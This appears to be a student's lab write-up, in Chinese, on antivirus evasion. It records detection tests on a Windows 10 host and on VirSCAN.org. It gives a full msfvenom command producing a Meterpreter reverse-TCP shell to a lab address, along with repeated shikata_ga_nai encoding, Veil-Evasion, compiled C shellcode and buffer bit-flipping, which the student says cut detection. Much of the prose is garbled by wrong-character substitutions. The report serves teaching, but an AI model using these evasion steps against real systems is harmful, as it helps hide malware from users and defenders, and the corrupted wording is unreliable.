20145320免杀原理与实践

20145320免杀原理与实践

1.基础问题回答

（1）杀软是如何检测出恶意代码的？

恶意代码检测方式

• 1.基于特征码的检测

• 2.启发式恶意软件检测

• 3.基于行为的恶意软件检测
  （2）免杀是作什么？

• 免杀，也就是反病毒（AntiVirus）与反间谍（AntiSpyware）的对立面，英文为Anti-AntiVirus（简写Virus AV），逐字翻译为“反-反病毒”，翻译为“反杀毒技术”。 被谁杀？固然是被杀毒软件（引擎）杀。因此，要作好免杀技术（防护），就要弄清杀毒方式（攻击），也就是这些杀毒软件是如何工做的。

（3）免杀的基本方法有哪些？

• 改变特征码

• 改变行为

• 其它方法

2.实践过程记录

尝试将上个实践生成的一个生成可执行（反弹式）木马程序攻击我所使用的win10主机，所使用的杀毒软件时腾讯的电脑管家。
刚将生成的后面软件拖到win10主机中就被电脑管家当作木马回收了，

可是当我第二次将这个后面软件拖到桌面时，则被告知安全？！

双击发现并不能运行，看来仍是没有放过他。

一样尝试经过VirSCAN.org来检验一下

从上图能够看出，共有20款杀软一针见血的指出了该程序为“木马类”程序，可是其中并不包括360。（这应该是没有更新360的版本的缘故，由于以前我在作实践2的时候所使用的360杀毒软件也能够秒杀个人后面软件，后来才换成了电脑管家）

接下来咱们将针对杀软如何判断某个软件是否为病毒的方法来打造咱们的病毒！

基于特征码的改变来实现免杀

使用Veil-Evasion免杀平台

生成过程这里再也不列举，你们能够参照张薇同窗的博客

一样使用我亲爱的电脑管家看看：（win10下）
电脑管家

不爱了

再用VirSCAN.org检测：

？？我生成了假的代码

再生成一次：

这还差很少。。

使用shikata_ga_nai编码器生成meterpreter可执行文件

• 一次编码
  

反而更多了一个杀软能够查杀了...

• 八次编码以后

首先使用电脑管家看看

没问题。。

再经过VirSCAN.org看看：

依然有18款杀软发现了这个后面软件

C语言调用Shellcode

在kali主机下，进入终端，执行指令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.152.128 LPORT=8888 -f c > 5320shelldoor.c

将这个c文件复制到主机用Microsoft Visual Studio 2013进行编译运行生成可执行文件

VirSCAN.org检测结果以下：

只有7款杀软件发现了！！

尝试回连linux

成功了，此次操做的是个人带着电脑管家的win10主机，桌面截图以下：

此次尝试对buf里面的数据进行改动，这里尝试了按位取反：

还尝试了逐位加1

真的大大缩小被查到的概率了！！

3.离实战还缺些什么技术或步骤？

上述都是使用软件生成木马软件，通常都被各大杀毒软件的病毒库所收录了，因此产生的木马真的能产生做用的仍是比较少，纯手工打造的木马我如今还只知道一些皮毛，离真正的实战还很远...并且咱们生成的木马如今是本身手动拖拽到主机里面，要把这个木马导入到别人的电脑里面确定没有这么简单，还要千方百计去制做一些陷阱，例如挂马软件。

4.实践总结与体会

经过此次实验，我了解到了杀毒软件查杀的原理，知道原来杀毒软件也是这么水的，也知道了恶意代码是如何想尽办法假装的；单纯依赖查杀软件或者防火墙是能完美保护咱们的电脑主机的？不存在的绝对安全；

道高一尺魔高一丈，杀毒与免杀就是在相互斗争之中不停的进步，只要互联网还存在，杀毒与免杀的斗争就没法中止；杀毒软件的薄弱在本次实践中可见一斑，因此之后在网络中别随意乱点不明连接，说不定就是同窗制做的木马...